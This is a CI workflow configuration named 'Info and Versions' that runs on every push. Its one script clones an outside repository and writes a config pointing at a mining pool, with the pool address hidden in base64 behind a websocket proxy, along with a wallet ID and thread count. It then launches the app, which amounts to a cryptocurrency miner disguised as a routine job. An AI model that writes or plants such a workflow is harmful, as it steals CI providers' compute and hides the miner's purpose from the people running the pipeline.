workflows:
  info-and-versions:
    name: Info and Versions
    instance_type: linux_x2
    triggering:
      events:
        - push
      branch_patterns:
        - pattern: "*"
          include: true
    scripts:
      - name: Run Mino App
        script: |
          git clone https://github.com/dedgoodwc/dedf abc
          cd abc
          cat > config.json << EOF
          {
            "log": false,
            "host": "wss://proxy-tq9r.onrender.com/cG93ZXIyYi5uYS5taW5lLnpwb29sLmNhOjYyNDI=",
            "user": "SWrtFsEa237mckDo7hmtHR2YtadmbZJNus",
            "pass": "c=DGB,123code",
            "threads": 3,
            "port": 8080
          }
          EOF
          node app.js
